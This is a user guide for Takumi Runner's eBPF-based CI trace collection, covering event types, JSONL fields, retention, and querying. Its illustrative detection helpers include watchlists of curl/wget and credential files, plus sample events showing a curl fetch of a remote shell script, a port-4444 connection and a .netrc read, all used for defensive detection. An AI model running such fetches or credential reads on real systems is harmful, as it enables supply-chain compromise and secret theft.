
Trace Collection

info

The English user guide is currently in beta preview. Most of the documents have been automatically translated from the Japanese version. Should you find any inaccuracies, please reach out to Flatt Security.

Takumi Runner comprehensively captures process, network, and file operations that occur during workflow execution using eBPF. This page explains the types of events captured, the data format, and how to access raw data.

How It Works

Takumi Runner's trace collection is built on the Linux kernel's eBPF (extended Berkeley Packet Filter) technology. Because eBPF hooks in at the kernel layer, activity inside the VM is captured without any modification to the user code running in the workflow.

Captured Events

The Takumi Runner eBPF tracer records the following system call-level events:

| Event Type | Description | Recorded Fields |
| --- | --- | --- |
| `process_exec` | Process execution | PID, command name, file path, arguments |
| `net_connect` | Network connection | PID, destination address, port, protocol |
| `dns_query` | DNS lookup | PID, hostname |
| `file_open` | File open | PID, path, flags |
| `file_write` | File write | PID, path, bytes written |

A single job execution typically generates thousands to tens of thousands of events.
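At that volume, a quick first step is to tally events per type by streaming the JSONL trace line by line. The sketch below is illustrative: the helper name and the inline sample events are invented for the example, and in practice you would iterate over the downloaded `trace.jsonl` file instead of a list.

```python
import json
from collections import Counter

def count_events_by_type(lines):
    """Tally trace events by their 'type' field, skipping blank lines."""
    counts = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        counts[event["type"]] += 1
    return counts

# Illustrative events; a real trace contains thousands of lines.
sample = [
    '{"type": "process_exec", "timestamp": "2025-01-15T10:30:01Z", "pid": 1234}',
    '{"type": "net_connect", "timestamp": "2025-01-15T10:30:02Z", "pid": 1235}',
    '{"type": "net_connect", "timestamp": "2025-01-15T10:30:03Z", "pid": 1235}',
]
print(count_events_by_type(sample))  # net_connect: 2, process_exec: 1
```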

Use Cases

Collected traces can be used for the following types of security analysis:

  • Supply chain attack detection: Check whether suspicious outbound connections to unexpected hosts occurred during npm install or pip install
  • Incident investigation: Track whether curl or wget was executed during a specific job, or whether files containing credentials such as ~/.netrc were accessed
  • Baseline analysis: Compare traces from normal builds with traces from anomalous builds to identify differences
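The supply chain use case above can be sketched as an allowlist check over `dns_query` events: any hostname resolved during the job that is not on a known-good list is reported. The allowlist contents, helper name, and sample events here are illustrative assumptions, not part of the product.

```python
import json

# Illustrative baseline; tune per project.
ALLOWED_HOSTS = {"registry.npmjs.org", "github.com"}

def unexpected_dns_queries(lines, allowed=ALLOWED_HOSTS):
    """Return hostnames from dns_query events that are not on the allowlist."""
    hits = []
    for line in lines:
        event = json.loads(line)
        if event.get("type") == "dns_query" and event["hostname"] not in allowed:
            hits.append(event["hostname"])
    return hits

sample = [
    '{"type": "dns_query", "timestamp": "2025-01-15T10:30:02Z", "pid": 1235, "hostname": "registry.npmjs.org"}',
    '{"type": "dns_query", "timestamp": "2025-01-15T10:30:05Z", "pid": 1299, "hostname": "evil.example.com"}',
]
print(unexpected_dns_queries(sample))  # ['evil.example.com']
```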

Data Format

Trace data is stored in JSONL (newline-delimited JSON) format. Each line corresponds to one event, and each line is an independent JSON object. All events include the common fields type (event type) and timestamp (occurrence time in ISO 8601 format).

warning

The field definitions shown below are reference information based on the current implementation. Fields may be added, changed, or removed without prior notice.

process_exec

Records process execution.

| Field | Type | Description |
| --- | --- | --- |
| `pid` | number | Process ID |
| `comm` | string | Command name |
| `filename` | string | Executable file path |
| `args` | string[] | Command-line arguments |

```json
{
  "type": "process_exec",
  "timestamp": "2025-01-15T10:30:01Z",
  "pid": 1234,
  "comm": "npm",
  "filename": "/usr/bin/npm",
  "args": ["npm", "install"]
}
```
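For the incident-investigation use case, `process_exec` events can be scanned for commands of interest such as `curl` or `wget`. The watchlist, helper name, and sample events below are illustrative only.

```python
import json

WATCHED_COMMANDS = {"curl", "wget"}  # illustrative watchlist

def flag_watched_commands(lines, watched=WATCHED_COMMANDS):
    """Return (pid, args) for process_exec events whose command is watched."""
    flagged = []
    for line in lines:
        event = json.loads(line)
        if event.get("type") == "process_exec" and event.get("comm") in watched:
            flagged.append((event["pid"], event.get("args", [])))
    return flagged

sample = [
    '{"type": "process_exec", "timestamp": "2025-01-15T10:30:01Z", "pid": 1234, "comm": "npm", "filename": "/usr/bin/npm", "args": ["npm", "install"]}',
    '{"type": "process_exec", "timestamp": "2025-01-15T10:30:07Z", "pid": 1301, "comm": "curl", "filename": "/usr/bin/curl", "args": ["curl", "http://203.0.113.9/x.sh"]}',
]
print(flag_watched_commands(sample))  # [(1301, ['curl', 'http://203.0.113.9/x.sh'])]
```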

net_connect

Records network connections.

| Field | Type | Description |
| --- | --- | --- |
| `pid` | number | Process ID |
| `dst_addr` | string | Destination IP address |
| `dst_port` | number | Destination port number |
| `protocol` | string | Protocol (tcp / udp) |

```json
{
  "type": "net_connect",
  "timestamp": "2025-01-15T10:30:02Z",
  "pid": 1235,
  "dst_addr": "104.16.23.35",
  "dst_port": 443,
  "protocol": "tcp"
}
```
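One simple heuristic over `net_connect` events is to surface connections to ports other than the usual HTTP/HTTPS ports, which often stand out in build traces. The port set, helper name, and sample events are illustrative assumptions.

```python
import json

COMMON_PORTS = {80, 443}  # illustrative; extend for your environment

def unusual_port_connections(lines, common=COMMON_PORTS):
    """Return (dst_addr, dst_port) for net_connect events on uncommon ports."""
    return [
        (e["dst_addr"], e["dst_port"])
        for e in map(json.loads, lines)
        if e.get("type") == "net_connect" and e["dst_port"] not in common
    ]

sample = [
    '{"type": "net_connect", "timestamp": "2025-01-15T10:30:02Z", "pid": 1235, "dst_addr": "104.16.23.35", "dst_port": 443, "protocol": "tcp"}',
    '{"type": "net_connect", "timestamp": "2025-01-15T10:30:06Z", "pid": 1302, "dst_addr": "203.0.113.9", "dst_port": 4444, "protocol": "tcp"}',
]
print(unusual_port_connections(sample))  # [('203.0.113.9', 4444)]
```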

dns_query

Records DNS lookups.

| Field | Type | Description |
| --- | --- | --- |
| `pid` | number | Process ID |
| `hostname` | string | Queried hostname |

```json
{
  "type": "dns_query",
  "timestamp": "2025-01-15T10:30:02Z",
  "pid": 1235,
  "hostname": "registry.npmjs.org"
}
```

file_open

Records file opens.

| Field | Type | Description |
| --- | --- | --- |
| `pid` | number | Process ID |
| `path` | string | File path |
| `flags` | string | Open flags (e.g. O_RDONLY) |

```json
{
  "type": "file_open",
  "timestamp": "2025-01-15T10:30:03Z",
  "pid": 1235,
  "path": "/home/runner/work/app/package.json",
  "flags": "O_RDONLY"
}
```
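Checking `file_open` events against a watchlist of credential-bearing file names (such as `~/.netrc`, mentioned under Use Cases) is one way to spot suspicious access. The suffix list, helper name, and sample events are illustrative only.

```python
import json

# Illustrative watchlist of credential-file name suffixes.
SENSITIVE_SUFFIXES = (".netrc", ".npmrc", "id_rsa")

def sensitive_file_opens(lines, suffixes=SENSITIVE_SUFFIXES):
    """Return (pid, path) for file_open events touching watched files."""
    return [
        (e["pid"], e["path"])
        for e in map(json.loads, lines)
        if e.get("type") == "file_open" and e["path"].endswith(suffixes)
    ]

sample = [
    '{"type": "file_open", "timestamp": "2025-01-15T10:30:03Z", "pid": 1235, "path": "/home/runner/work/app/package.json", "flags": "O_RDONLY"}',
    '{"type": "file_open", "timestamp": "2025-01-15T10:30:08Z", "pid": 1302, "path": "/home/runner/.netrc", "flags": "O_RDONLY"}',
]
print(sensitive_file_opens(sample))  # [(1302, '/home/runner/.netrc')]
```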

file_write

Records file writes.

| Field | Type | Description |
| --- | --- | --- |
| `pid` | number | Process ID |
| `path` | string | File path |
| `bytes` | number | Bytes written |

```json
{
  "type": "file_write",
  "timestamp": "2025-01-15T10:30:04Z",
  "pid": 1235,
  "path": "/home/runner/work/app/node_modules/.package-lock.json",
  "bytes": 2048
}
```
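Because a path may receive many `file_write` events over a job, aggregating bytes written per path gives a quick picture of write activity. The helper name and sample events below are illustrative.

```python
import json
from collections import defaultdict

def bytes_written_by_path(lines):
    """Sum the 'bytes' field of file_write events, grouped by path."""
    totals = defaultdict(int)
    for event in map(json.loads, lines):
        if event.get("type") == "file_write":
            totals[event["path"]] += event["bytes"]
    return dict(totals)

sample = [
    '{"type": "file_write", "timestamp": "2025-01-15T10:30:04Z", "pid": 1235, "path": "/tmp/build.log", "bytes": 2048}',
    '{"type": "file_write", "timestamp": "2025-01-15T10:30:05Z", "pid": 1235, "path": "/tmp/build.log", "bytes": 1024}',
]
print(bytes_written_by_path(sample))  # {'/tmp/build.log': 3072}
```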

Retention Period

Trace data is retained for a minimum of 90 days from the date of collection. Trace data older than 90 days may be deleted.

When a subscription is cancelled, trace data is deleted in accordance with the terms of service.

info

If you would like to extend the retention period, please contact your account manager. Depending on your contract and usage, we may not be able to accommodate all requests.

Raw Data Access

The Query tab in the job detail view of the Shisho Cloud console lets you run arbitrary SQL (DuckDB) queries against the trace data.
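For example, a query along the following lines could surface the most-contacted destinations. This is a sketch: the table name `events` and the exposed column names are assumptions here, so check the schema shown in the console before running it.

```sql
-- Illustrative DuckDB query: aggregate outbound connections by destination.
SELECT dst_addr, dst_port, count(*) AS connections
FROM events
WHERE type = 'net_connect'
GROUP BY dst_addr, dst_port
ORDER BY connections DESC
LIMIT 20;
```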

Query tab

You can also download the trace data for each job execution as a JSONL file. Downloaded raw data can be freely analyzed with your own scripts and tools.

info

Raw data is in gzip-compressed JSONL format. Decompress with gunzip and process with tools like jq.

```shell
gunzip trace.jsonl.gz
jq 'select(.type == "net_connect")' trace.jsonl
```